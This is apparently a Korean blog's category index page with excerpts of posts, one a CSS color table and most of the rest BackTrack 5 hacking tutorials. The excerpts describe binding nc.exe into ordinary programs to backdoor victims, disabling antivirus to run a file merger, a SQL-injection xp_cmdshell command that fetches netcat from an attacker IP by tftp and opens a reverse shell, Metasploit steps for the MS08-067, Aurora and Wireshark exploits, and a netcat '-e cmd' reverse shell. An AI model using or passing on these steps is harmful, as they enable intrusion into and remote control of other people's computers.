it

it/programming

CSS 색상 이름 rgb , 16진수 자료( css 색상표 )

256 컬러 색상표 / http://www.n2n.pe.kr/lev-1/color.htm미술세계 / http://www.misulsegye.com/aaa-Color.htm 색상256 복합수16진수 코드Snow255 250 250#FFFAFAGhostWhite248 248 255#F8F8FFWhiteSmoke245 245 245#F5F5F5Gainsboro220 220 220#DCDCDCFloralWhite255 250 240#FFFAF0OldLace253 245 230#FDF5E6Linen250 240 230#FAF0E6AntiqueWhite250 235 215#FAEBD7PapayaWhip255 239 213#FFEFD5BlanchedAlmond255 235 205#FFEBCDBisque255 228 ..

it/network

[BT5R2] 정상파일에 exploit 삽입하여 백도어(Back door) 감염시키기

이 공격은 NetCat 리버스 커넥션에서 한단계 업그레이드된 방법으로써소셜해킹 , 인간관계적인 해킹을 사용하는 방법입니다. 정상적이고 실행하고싶거나 실행해야하는 프로그램에 공격자의 nc.exe를 병합하여 반강제적으로 NetCat 공격을 감행하는것입니다. 이 공격에 감염되었던 사례가 네이트온과 농협 해킹사건입니다. 이 과정에는 두가지 프로그램이 필요합니다. nc.exe( netcat 프로그램 ) 과 파일병합 프로그램 PowermergerNetCat UNIX/LINUX 용 : http://netcat.sourceforge.net/download.phpWindows 용 : http://www.securityfocus.com/tools/139Powermergerhttp://hsol.tistory.com/664 ..

it/information

파일 병합프로그램 [ PowerMerger ] 소개/다운로드

두가지의 파일을 합쳐놓을(병합)때 필요한 병합프로그램 PowerMerger를 소개합니다. 좋은 곳에 사용하면 유용한 프로그램이지만 악의적인 곳에 사용할 경우 '나쁜' 프로그램이 될 수 있기에가끔 백신에서 잡아내는 모양이지만 바이러스는 없습니다. 단지 악용을 막기위해 잡는것이니 실행이 안되면 백신을 끄고 해보세요. 먼저 프로그램을 실행하면 이와 같은 창이 뜹니다. 첫번째 영역은 적용될 아이콘 파일이고요, *.ico 형식으로 된 파일을 추가 할 수 있습니다. 두번째, 세번째 영역은 합칠 파일 두개를 선택하는 곳입니다.어느 파일이든 확장자가 무엇이든 상관없이 두 파일을 병합할 수 있습니다. Merge! 버튼을 누르면 병합이 완료됩니다. 생성된 파일을 실행 시 합쳐진 두개의 파일이 동시에 실행되는것을 볼 수 있..

it/network

[BT5R2] 웹 취약점을 이용한 리버스 커넥션

웹 취약점을 이용하여 리버스 커넥션 수행 및 점령1) 서버 컴퓨터의 정보 SQL Injection - OS: windows2000 - DBMS: MS-SQL - 확장프로시저:XP_CMDSHELL 2) NC 업로드(tftp이용)- 'exec master.dbo.xp_cmdshell 'tftp -i 공격자ip get nc.exe 대상디렉토리\파일.exe' -- ex)'exec master.dbo.xp_cmdshell 'tftp -i 163.152.110.135 get nc.exe c:\test\test.exe' -- 3) 공격자 PC 대기상태 돌입nc -lvp 임의의portex) nc -lvp 7777 4) 피해자 웹서버가 공격자에게 리버스 커넥션 수행'exec master.dbo.xp_cmdshell 'c..

it/network

[BT5R2] wireshark 취약점 공격

BT5R2 - root - toor - startx - msfconsole [wireshark 취약점] 1. msfconsole 2. search wireshark 3. use multi/misc/wireshark_lwres_getaddrbyname 4. show options 5. set rhost 타겟IP ex) set rhost 192.168.198.128 6. show targets 7. set target 4 8. show payloads 9. set payload windows/vncinject/reverse_tcp 10. set lhost 공격자IP ex) set lhost 192.168.198.142 11. set lport 5555

it/network

[BT5R2] MS10_002_aurora 공격

BT5R2 - root - toor - startx - msfconsole [MS10_002_aurora] #XP(피해자PC) - 시작 -> 실행 -> lusrmgr.msc - 사용자 -> administrator -> 암호설정 1) search browser 2) use windows/browser/ms10_002_aurora 3) show options 4) set srvport 80 5) set uripath test.html 6) show payloads 7) set payload windows/meterpreter/reverse_tcp 8) show options 9) set lhost 공격자ip(ifconfig -> eth1 -> inetaddr) ex) set lhost 192.168.198..

it/network

[BT5R2] MS08-067 Netapi 공격

BT5R2 - root - toor - startx - msfconsole [MS08-067 Netapi 공격] 1) search 067 2) use windows/smb/ms08_067_netapi 3) show options 4) set rhost 192.168.198.128 5) show payloads 6) set payload windows/shell/bind_tcp 7) show options 8) exploit * CTRL + Z: 유지 * CTRL + C: Abort * sessions -l sessions -i (id)

it/network

NetCat을 이용한 리버스 커넥션

1. 공격자PC - cmd - nc.exe 가 위치한 경로로 이동 - nc -lvp 임의의 port ex)nc -lvp 5555 - 리스닝 모드(대기상태) 돌입 2. 피해자 PC - CMD - nc.exe 가 위치한 경로로 이동 - nc 공격자IP port번호 -e cmd

반응형
훈솔
'it' 카테고리의 글 목록 (10 Page)